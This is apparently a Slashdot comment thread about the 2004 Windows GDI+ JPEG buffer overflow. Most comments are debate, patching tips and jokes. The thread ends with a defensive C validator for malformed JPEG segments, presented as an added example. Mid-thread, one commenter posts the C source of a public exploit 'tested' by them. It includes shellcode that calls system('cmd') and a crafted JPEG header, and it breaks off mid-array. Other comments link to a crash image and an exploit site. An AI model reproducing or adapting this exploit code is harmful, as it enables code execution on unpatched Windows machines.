Public Exploit For Windows JPEG Bug
Khoo writes "A sample program hit the Internet on Wednesday, showing by example how malicious coders could compromise Windows computers by using a flaw in the handling of a widespread graphics format by Microsoft's software. Security professionals expect the release of the program to herald a new round of attacks by viruses and Trojan horses incorporating the code to circumvent security on Windows computers that have not been updated. The flaw, in the way Microsoft's software processes JPEG graphics, could allow a program to take control of a victim's computer when the user opens a JPEG file." We mentioned this earlier.
I knew there was something wrong with Goatse when I saw it!
Now, to convince my company's managers to switch their userbase to Firefox, I just need it to support SSO (single sign-on). Please, tell us it's coming, otherwise we'll keep using this tyrabrowsaurus...
Trolling using another account since 2005.
The patch for this one is already out. Furthermore, SP2 systems do not have this vulnerability unless Office is installed. SP2 by default has auto-updates enabled. And for Office to be exploited in a SP2 system, the user has to open the file manually.
Code is always buggy. Even Firefox had a JPEG vulnerability of its own. This is dumb ownership, if this bug becomes prevalent.
A NYC lawyer blogs. http://www.chuangblog.com/
What about the vuln. in the PNG libs? Any exploit in the wild?
cpghost at Cordula's Web.
The biggest problem here is when spammers use this in their opt-out link. This would probably be much more effective than the scrollbar hack they are using now. It just has to render the damn page, and wham, you're infected.
...because I have not seen this mentioned at all.
Is the JPEG rendering in Firefox running on Windows independent of any underlying MS library and is therefore not affected?
On November 5 1999 we had the "Burn all GIFs" day because of patent issues. Shall we announce a "Burn all JPEGs" day because of Microsoft security issues now and switch all to PNG?
Damn. Now in addition to worrying about going blind I also have to worry about catching something.
What's all this stuff in the related links?
. Bug whitepapers
. Best deals: Bug
. More Bug stories
. Security whitepapers
. Best deals: Security
. More Security stories
. Windows whitepapers
. Best deals: Windows
. More Windows stories
. Microsoft whitepapers
. Best deals: Microsoft
When did that start happening?
Get your own free personal location tracker
These early POC exploits are covered in today's ISC Diary. Note that now there is a script to generate images to add an Admin-level user (username "X").
:-/
Not too long until we see a remote shell.
Some people are talking about seeing it used in an MSN Messenger worm.
The hard part about patching this one is that a lot of third-party software may overwrite the Windows JPEG GDI library with its own older version.
---- join dshield.org Distributed Intrusion Detec
So much noise about an ordinary Windows insecurity...
.NET core is the last Microsoft's chance to correct its public image as the 'most insecure software vendor'.
IMHO, Longhorn with
Another question: when will Longhorn be out before Duke Nukem Forever?
Does that mean when you watch porn on the Web it is not safe sex anymore? Damn it!!!
Pick your OS and download it here
:)
Also, if you have SP2 or uh, don't use MS software, you're fine
I'm a minister!
And it actually works fairly well. It scans for any program that reads these files and makes sure they don't have the bug in them. If it can't patch them, it bugs you about it so you can find a fix for the app. Only Microsoft apps of course, I don't think Adobe wants Microsoft pushing out software updates for them.
Most of the users I have to support aren't savvy enough to add a printer (omg, with active directory it's like 3 mouse clicks) or install software or apply updates (we use some banking software and it notifies you with a text box to click "OK" and then "File, Update" but I still get called on it every time). That's why at our offices we use Microsoft System Update Server (SUS). It lets us approve patches and then roll them out to all the clients in the domain automagically.
I shudder to think what would happen if I tried to roll out firefox or mozilla to everyone. I'd probably get calls that their "e" was missing and they couldn't connect to the internet. I swear, some people just shouldn't be on computers.
This article has recently been linked from Slashdot. Please keep an eye on the page history for errors or vandalism.
but I have a strong suspicion
... well something you just don't know. Good luck for being objective.
Everyone is entitled to their own suspicion.
The level of polish and craftsmanship of open source software
As opposed to the level of polish and craftsmanship of Microsoft's products, of which you know nothing. So you are comparing apples to
Write boring code, not shiny code!
Pick your OS and download it here!
Of course here, is this place --> here
I knew that preview button was good for something
I'm a minister!
You can do something with Active Directory to enable single sign on so that your browser can use your Windows credentials to figure out who you are.
An example being that I log into my laptop on the corporate network in the morning, but then never need to log into our Intranet. It uses my Active Directory credentials to figure out who I am, so displays my own customised and personalised Intranet settings.
I'm not too sure how it works but it's very handy!
--- Band: Joey Ultra
About a year or so back there was a Slashdot story about, I think, McAfee researchers talking about viruses being transmitted over images. Everyone called it stupid market speak from a firm trying to sell more AV products by scaring people with something that is not possible. I think we all need to offer them an apology. I think this is a bizarre parallel to when people used to joke about email viruses way back in the mid 90s. Kind of sad that it is real now. It will be even more so when images are used for exploits too. Though I suspect those at most risk are those that go to websites looking for lots of images...
The war with islam is a war on the beast
The war on terror is a war for peace
This bug exists in most Microsoft Software. So for someone to patch they can't simply connect to Windows Update and consider themselves safe, they also have to patch Office, Visual Studio, some Microsoft Games, Server Software (misc, not covered by Update) and more.
So don't sit there on an SP2 system and consider yourself safe. There is more than likely a whole host of ActiveX controls just waiting to be called and exploited by this bug.
Also note that some applications written in Visual Basic can also be exploited.
Is there a tool to process JPG files searching for malicious content?
You can make a big fucking quilt with all those patches they keep giving out!
Really? It loads pages faster for me. Sure, the initial start up time is worse, but...
:P
Just because you took his comment out of context doesn't mean he's a troll.
Well... "know nothing" is not really true, counting the numerous holes, fixed holes and whatnot, and also the rather long response times for some of them...
Yes, I know open source software also has numerous bugs, but as it's "open" source the flaws are usually found much faster and fixed within hours (if possible).
-- Karma: beyond good and evil - mostly affected by posting political
It is called NTLM authentication.
-jsl
Dyslectics of the world, untie!
M$ release SP2 for XP. People resist installing because they hear it can screw things up etc., so they delay installing. M$ announce a new flaw with sample code in the wild, showing how every O/S they have (practically) is susceptible EXCEPT XP SP2. ...? Funny order of events, no?
Visit London Scalextric Club
Everyone knew it was a backdoor.
Sincerely,
Pan Tarhei Hosé, PhD.
"Homo sum et cogito ergo odi profanum vulgus et libido."
of which you know nothing
As a user of Microsoft products, I witness their lack of stability, their tendency to crash or exhibit bugs, and their uncanny ability of corrupting user data, and so forth. After putting up with them for so long, I know quite a bit about them.
Moreover, I used to be an employee. I worked at the Redmond campus. I know both the quality exhibited on the outside, and the quality that goes into the products on the inside.
I do indeed know something.
http://sylvana.net/test/AP4.jpg
will crash IE on an updated xp sp2 system.
Open source software has plenty of bugs, duh.
In fact, there are similar problems with parsing image files on Linux as well. Except that Windows is actually more secure, because it has auto-updates turned on by default from XP SP2 onwards, and stack protection type patches built in by default. On Fedora you have Exec Shield, but that hasn't been fully upstreamed yet, so only a small subset of Linux users are protected. I don't know of any distros that download and apply security patches with no user intervention out of the box.
(recall OS X's open source roots)
Even if open source software was perfect (which it isn't) large parts of MacOS X are not open source. Most of the important bits aren't, in fact. Surprise surprise, the Mac has had serious URL handler exploits which are like this JPEG problem: arbitrary code execution via a web browser. Except in the case of the Mac URL handler problems it was a design problem not just an unchecked buffer, to do with insecure-by-design features. D'oh. ActiveX all over again.
So, no, I don't trust Apple any more than Microsoft when it comes to security. How can you? They are both proprietary OS companies, with all the issues that implies.
can never be duplicated by Microsoft's paranoid and closed-doors efforts
These days Microsoft have dedicated programs scanning their code looking for suspicious patterns, security testing teams, and give their developers extensive training in how to write secure code. These are advantages not available to open source coders. If anything I'd say they're close to taking the lead in absolute terms for security (by which I mean, assume equal market share for Windows, Linux, Macintosh - which is more secure).
You know, it might be worthwhile to write things like libjpeg in safe languages.
OCaml is pretty fast, but I realize that not everyone wants the runtime. How about Cyclone? It's an extended version of C that's backwards compatible with C, but can pick up unsafe errors at compile time -- sounds pretty much like what folks might want.
May we never see th
It is already built in. It only has to be activated per server.
- about:config
- filter for ntlm
- enter comma separated list for network.automatic-ntlm-auth.trusted-uris
Voila!
-jsl
Dyslectics of the world, untie!
I don't see a link to the sample exploit in the article...
well, here is one link.
.sig: No such file or directory
Still this may also be very good grounds for a class action against MS, as they are not honouring a users request NOT to use IE.
That anti-trust case will be raised by 2006 and resolved by 2014, by which time the successor to the successor to the successor of Longhorn will be released, with a few more dozen anti-trust issues and another slap on the wrist from the DoJ.
Kjella
Live today, because you never know what tomorrow brings
WindowsUpdate does install a "GDI+ Detection Tool", but I have run this tool on systems with unpatched Visual Studio, Outlook, and Office and it does not detect that the patches are missing. I looked at the strings in this tool, and it basically looks like it checks for MS Photo software.
Manually visiting "officeupdate.microsoft.com" and running those updates will probably cover the most common attack vectors (Outlook, Word), but how many people do this on a regular basis? My users are not admin-level (yet) so they can't use this update site.
Incidentally, every default configuration of IE/Word I have seen allows DOC files with jpegs to be opened in the browser window with no prompting. It will not be hard to get people to run the exploits, and there's plenty of ways for worms to automate themselves without users opening things.
I'm working on a script to detect and run the patches (there's about 17 of them for this bug) but it's going to be a while because of the pre-reqs for many of the patches, and the very specific revisions that must match the patch. "If Visio 2002 is installed, detect which Visio SP level is running. If it's SP0 or SP1, run Visio SP2, then reboot, and run GDI patch"...
Sorry if I'm spreading panic, but this bug sucks.
You remember when she told you that looking at `those' pictures was bad...
_O_
.|< The named which can be named is not the true named
but it was too late, she'd already been wormed.
_O_
.|< The named which can be named is not the true named
Writing a proxy server that validates or blocks all JPG images going through it is probably possible. Such a proxy can also process PNG, BMP and other vulnerable formats. This proxy could be run either at the user level (personal protection) or at the ISP level.
Time to start a new open source project !
Everyone seems to be expecting infected pr0n or e-mail... it's so much simpler than that; it's been scaring me since this exploit was announced. I'd say about 2/3rds of the corporate computers in this country are still vulnerable, and enough of them visit MSN or CNN.com on a regular basis for a simple banner ad to give someone a REALLY nice assortment of zombie PCs.
Pavlov's Dog ate the bell, and now he's barking at Schroedinger's cat all the time... -Me
I better make sure to convert all of my porn to
... are the books by Microsoft Press.
Check out the setting "network.automatic-ntlm-auth.trusted-uris". It will automatically send your Windows credentials to any URL listed in the comma-separated list.
æeee!
They're written in the notorious "buffer overflow" languages, so most people will have these problems for the near future.
Meanwhile what you can do is to run each program as a different more restricted user.
On Windows XP, run IE using a shortcut that does a runas with savecred (you should modify the shortcuts in the Start menu and Quick Launch too), and set it so it runs using a very restricted account. The restricted account should either have access to your bookmarks, history and temporary files, or you should run it so it changes to the restricted user's home directory and you allow your main account access to the restricted user's home directory.
Look up the runas command for the options. It'll be more convenient on WinXP since there's the savecred feature.
On UNIX, I think you can use sudo or something similar. Sudo to a restricted account and then run the browser.
This way, if your program gets exploited it can only ruin what the restricted user has access to, it can't easily touch the rest of the system.
Exploits can still theoretically touch the rest of the system since there's stuff like shatter attacks (for windows, not sure about KDE/GNOME), and I'm sure display drivers have bugs of their own and they run in ring 0 (on windows).
But if you do this it raises the bar significantly.
There are other options if you're really paranoid and don't mind the extra effort.
For info on exploits: badcoded. Note: This is not a 0day site, it is real info for exploit writing.
When we were leaving his room he gave us this advice: "Beware the JPEG virus". It was 9 years ago and he was quite old and sometimes he acted/talked nonsense, so we made fun of his advice (we thought: since it was not an executable file, how could it carry a virus?), but he was right and we were wrong.
This message doesn't need a sig
I've come up with the ultimate computer exploit, ever. You make a jpg of goatse, with this exploited code in it. The exploit code runs an application which activates any webcams, if present, and starts taking pictures, which it then sends back to the 31337 h4x0r.
Think of it, an entire gallery of horrified faces, kinda like in The Ring when people's faces went all nasty after watching the video.
Here's the copy I tested with (compiles with just about any C compiler, I used MS Visual C++ with the command line "cl /MD exploit.c"). I've disassembled the shell code to be sure it does what's claimed, and it seems legit to me.
// GDI+ buffer overrun exploit by FoToZ
// NB: the headers here are only sample headers taken from a .JPG file,
// with the FF FE 00 01 inserted in header1.
// Sample shellcode is provided
// You can put approx. 2500 bytes of shellcode...who needs that much anyway
// Tested on an unpatched WinXP SP1
#include <direct.h>
#include <stdio.h>
// shellcode disassembles to:
//   push "cmd " / mov eax,esp / push eax / mov eax,77c28044h (address of system() on WinXP SP1) / call eax
char shellcode[]=
"\x68"
"cmd "
"\x8B\xC4"
"\x50"
"\xB8\x44\x80\xC2\x77"
"\xFF\xD0"
;
char header1[]=
"\xFF\xD8\xFF\xE0\x00\x10\x4A\x46\x49\x46\x00\x01\x02\x00\x00\x64"
"\x00\x64\x00\x00\xFF\xEC\x00\x11\x44\x75\x63\x6B\x79\x00\x01\x00"
"\x04\x00\x00\x00\x0A\x00\x00\xFF\xEE\x00\x0E\x41\x64\x6F\x62\x65"
"\x00\x64\xC0\x00\x00\x00\x01\xFF\xFE\x00\x01\x00\x14\x10\x10\x19"
"\x12\x19\x27\x17\x17\x27\x32\xEB\x0F\x26\x32\xDC\xB1\xE7\x70\x26"
"\x2E\x3E\x35\x35\x35\x35\x35\x3E";
// call $+5 / pop ebx / lea ecx,[ebx+0x500] / add ebx,0x12 / mov byte [ebx],0x90 / inc ebx / cmp ebx,ecx / jne back
char setNOPs1[]=
"\xE8\x00\x00\x00\x00\x5B\x8D\x8B"
"\x00\x05\x00\x00\x83\xC3\x12\xC6\x03\x90\x43\x3B\xD9\x75\xF8";
char setNOPs2[]=
"\x3E\xE8\x00\x00\x00\x00\x5B\x8D\x8B"
"\x2F\x00\x00\x00\x83\xC3\x12\xC6\x03\x90\x43\x3B\xD9\x75\xF8";
char header2[]=
"\x44"
"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x01\x15\x19\x19"
"\x20\x1C\x20\x26\x18\x18\x26\x36\x26\x20\x26\x36\x44\x36\x2B\x2B"
"\x36\x44\x44\x44\x42\x35\x42\x44\x44\x44\x44\x44\x44\x44\x44\x44"
"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44"
"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\xFF\xC0\x00"
"\x11\x08\x03\x59\x02\x2B\x03\x01\x22\x00\x02\x11\x01\x03\x11\x01"
"\xFF\xC4\x00\xA2\x00\x00\x02\x03\x01\x01\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x03\x04\x01\x02\x05\x00\x06\x01\x01\x01\x01"
"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x02"
"\x03\x10\x00\x02\x01\x02\x04\x05\x02\x03\x06\x04\x05\x02\x06\x01"
"\x05\x01\x0
I've *always* scanned ALL files -- because even in the DOS era, you could never rely on the extension and the functionality having anything to do with one another. (Remember XTreeGold for DOS? the *.XTP files are *executables*, called by XTG.EXE as needed.)
:(
Occasionally even then, the front end of a virus was named whatever.com and was itself "clean" (so would be passed by most scanners), but its job was to call the REAL executable, named something like whatever.dat, which contained the virus code (and if you limited your scanner to known-executables, it would be missed). I have personally seen a virus carried in the whatever.dat part of some purported utility.
As to viruses in image files, it has always been theoretically possible to execute code placed in a GIF's comment field, and I vaguely recall there was a similar exploit possible for JPGs. The only reason this GIF exploit was never seen in the wild is because in the olden days, you couldn't count on everyone using the same viewing software; there were dozens of DOS image viewers, no two of which worked alike. NOW, a virus author can pretty much count on the majority of users using such files thru some combination of Windows, IE, and M$Office, so such formerly-obscure tricks become worth the bother. Much more so when M$ kindly offers malware authors a leg up like this.
~REZ~ #43301. Who'd fake being me anyway?
Important part is in bold.
On that site are 3 important images: AlexPaul2, AP3, and AP4. All 3 display correctly in Firefox, IrfanView, and Windows Picture and Fax Viewer. The only problem seems to be with IE.
With IE:
AlexPaul2 - correct
AP3 - hues are wrong, red and blue appear to be switched
AP4 - CRASH
All of these use 3 components in the scan, so there are 6 bytes total for that portion of the SOS block.
AlexPaul2: 0100 0211 0311
AP3: 0100 0311 0211
AP4: 0311 0211 0100
I have tried switching the order of these to each other and the problem absolutely stems from here.
AP4 to AP3: 0100 0311 0211 - there is a red/blue hue difference between most programs and IE.
AP4 to AP2: 0100 0211 0311 - there is no difference between the programs and IE.
AP3 to AP4: 0311 0211 0100 - IE CRASH!
AP3 to AP2: 0100 0211 0311 - there is no difference, but the red/blue hue switch appears in BOTH normal programs and IE. In other words, AP3 appears the same in IE with both settings.
This last result makes me think IE is somehow trying to re-order these in ascending Component ID order, and this causes the errors.
One thing the JFIF document I found doesn't mention is that the order of these components matters. Changing the order always makes the jpeg appear different (sort of like a newspaper comic with the inks misaligned) in non-IE programs. If anyone knows more about this, please respond.
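Both the proxy idea further up and the AlexPaul2/AP3/AP4 experiment come down to inspecting JPEG marker segments before a decoder sees them, so here is a header walker as an added example; it is not code from this thread, from FoToZ or from Microsoft. It assumes two things: that any marker segment whose 16-bit length field is below 2 is malformed (the length counts its own two bytes, so 0 or 1 makes "length - 2" wrap, which is what the FF FE 00 01 insertion in header1 above relies on), and that ITU T.81 B.2.3 requires the SOS component selectors to follow the order in which the SOF frame header lists the components, which the AP3 (1,3,2) and AP4 (3,2,1) variants break. The byte arrays are constructed inputs, not the linked images, and names such as jpeg_check and JPEG_GOOD are this example's own.

```c
/* Added example (not from the thread, FoToZ or Microsoft): walk JPEG marker
 * segments and reject (1) any segment whose length field is < 2, the FF FE 00 01
 * case in the exploit above, and (2) an SOS whose component selectors are not an
 * in-order subsequence of the SOF component list (assumed rule: T.81 B.2.3).
 * Only segment framing is parsed; entropy-coded data is skipped, not decoded.
 * Sample inputs at the bottom are constructed, not real files. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

enum { JPEG_OK, JPEG_BAD_SOI, JPEG_TRUNCATED, JPEG_BAD_LENGTH, JPEG_BAD_HEADER, JPEG_SOS_ORDER };

struct jpeg_report {
    int status; size_t offset;   /* status code and offset of the marker where checking stopped */
    int nf, frame_ids[4];        /* component ids in SOF order */
    int ns, scan_ids[4];         /* component selectors in SOS order */
};

static uint16_t be16(const uint8_t *p) { return (uint16_t)((p[0] << 8) | p[1]); }
static int standalone(uint8_t m) { return m == 0x01 || (m >= 0xD0 && m <= 0xD8); }  /* TEM, RST0-7, SOI */
static int is_sof(uint8_t m) { return m >= 0xC0 && m <= 0xCF && m != 0xC4 && m != 0xC8 && m != 0xCC; }
static int stop(struct jpeg_report *r, int status, size_t off) { r->status = status; r->offset = off; return status; }

int jpeg_check(const uint8_t *buf, size_t len, struct jpeg_report *r)
{
    size_t pos = 2;
    memset(r, 0, sizeof *r);
    if (len < 2 || buf[0] != 0xFF || buf[1] != 0xD8) return stop(r, JPEG_BAD_SOI, 0);
    for (;;) {
        const uint8_t *p; uint8_t marker; size_t seglen; int i, j;
        while (pos + 1 < len && buf[pos] == 0xFF && buf[pos + 1] == 0xFF) pos++;  /* fill bytes */
        if (pos + 2 > len || buf[pos] != 0xFF) return stop(r, JPEG_TRUNCATED, pos);
        marker = buf[pos + 1];
        if (marker == 0xD9) return stop(r, JPEG_OK, pos);                         /* EOI */
        if (standalone(marker)) { pos += 2; continue; }
        if (pos + 4 > len) return stop(r, JPEG_TRUNCATED, pos);
        seglen = be16(buf + pos + 2);
        if (seglen < 2) return stop(r, JPEG_BAD_LENGTH, pos);                     /* check 1 */
        if (pos + 2 + seglen > len) return stop(r, JPEG_TRUNCATED, pos);
        p = buf + pos + 4;                                                        /* payload after length */
        if (is_sof(marker)) {
            /* P(1) Y(2) X(2) Nf(1), then Nf x { Ci, HiVi, Tqi } */
            if (seglen < 8 || p[5] < 1 || p[5] > 4 || seglen != 8u + 3u * p[5])
                return stop(r, JPEG_BAD_HEADER, pos);
            r->nf = p[5];
            for (i = 0; i < r->nf; i++) r->frame_ids[i] = p[6 + 3 * i];
        } else if (marker == 0xDA) {
            /* Ns(1), then Ns x { Csj, TdTa }, then Ss, Se, AhAl */
            if (seglen < 8 || p[0] < 1 || p[0] > 4 || seglen != 6u + 2u * p[0] || r->nf == 0)
                return stop(r, JPEG_BAD_HEADER, pos);
            r->ns = p[0];
            for (i = 0; i < r->ns; i++) r->scan_ids[i] = p[1 + 2 * i];
            /* check 2: scan components must appear in frame-header order (subsets allowed) */
            for (i = 0, j = 0; i < r->ns; i++, j++) {
                while (j < r->nf && r->frame_ids[j] != r->scan_ids[i]) j++;
                if (j == r->nf) return stop(r, JPEG_SOS_ORDER, pos);
            }
            /* skip entropy-coded data: FF 00 is a stuffed byte, FF D0..D7 a restart marker */
            pos += 2 + seglen;
            while (pos + 1 < len && !(buf[pos] == 0xFF && buf[pos + 1] != 0x00 &&
                                      !(buf[pos + 1] >= 0xD0 && buf[pos + 1] <= 0xD7)))
                pos++;
            continue;
        }
        pos += 2 + seglen;
    }
}

/* Constructed: 8x8 baseline frame with components 1,2,3, one scan listing 1,2,3, then EOI. */
const uint8_t JPEG_GOOD[] = {
    0xFF,0xD8,
    0xFF,0xC0,0x00,0x11,0x08,0x00,0x08,0x00,0x08,0x03,0x01,0x22,0x00,0x02,0x11,0x01,0x03,0x11,0x01,
    0xFF,0xDA,0x00,0x0C,0x03,0x01,0x00,0x02,0x11,0x03,0x11,0x00,0x3F,0x00,
    0x12,0x34,0xFF,0x00,0x56,                     /* "data" containing one stuffed FF 00 */
    0xFF,0xD9 };
/* Constructed: same frame, but the SOS lists the components as 3,2,1 like AP4. */
const uint8_t JPEG_AP4_ORDER[] = {
    0xFF,0xD8,
    0xFF,0xC0,0x00,0x11,0x08,0x00,0x08,0x00,0x08,0x03,0x01,0x22,0x00,0x02,0x11,0x01,0x03,0x11,0x01,
    0xFF,0xDA,0x00,0x0C,0x03,0x03,0x11,0x02,0x11,0x01,0x00,0x00,0x3F,0x00,
    0x12,0x34,0xFF,0x00,0x56,
    0xFF,0xD9 };
/* Constructed: SOI followed by the COM segment of length 1 that header1 above inserts. */
const uint8_t JPEG_BAD_COM[] = { 0xFF,0xD8, 0xFF,0xFE,0x00,0x01, 0xFF,0xD9 };

int jpeg_status(const uint8_t *buf, size_t len) { struct jpeg_report r; return jpeg_check(buf, len, &r); }
size_t jpeg_stop_offset(const uint8_t *buf, size_t len) { struct jpeg_report r; jpeg_check(buf, len, &r); return r.offset; }

int main(void)
{
    static const char *const name[] = { "ok", "bad SOI", "truncated", "bad segment length",
                                        "bad SOF/SOS header", "SOS order mismatch" };
    printf("JPEG_GOOD:      %s\n", name[jpeg_status(JPEG_GOOD, sizeof JPEG_GOOD)]);
    printf("JPEG_AP4_ORDER: %s at offset %zu\n", name[jpeg_status(JPEG_AP4_ORDER, sizeof JPEG_AP4_ORDER)],
           jpeg_stop_offset(JPEG_AP4_ORDER, sizeof JPEG_AP4_ORDER));
    printf("JPEG_BAD_COM:   %s at offset %zu\n", name[jpeg_status(JPEG_BAD_COM, sizeof JPEG_BAD_COM)],
           jpeg_stop_offset(JPEG_BAD_COM, sizeof JPEG_BAD_COM));
    return 0;
}
```

A filtering proxy built on this would run jpeg_check over each image body and drop anything that does not come back JPEG_OK; because the walker never touches the entropy-coded data it cannot vouch for the image itself, only for the segment framing that a decoder parses first, which is exactly the part the GDI+ bug lives in. The order rule is also consistent with the hue observation above: a viewer that honours the selector order as written hands the chroma tables to the wrong components, while one that silently re-sorts the components shows the image as the author intended.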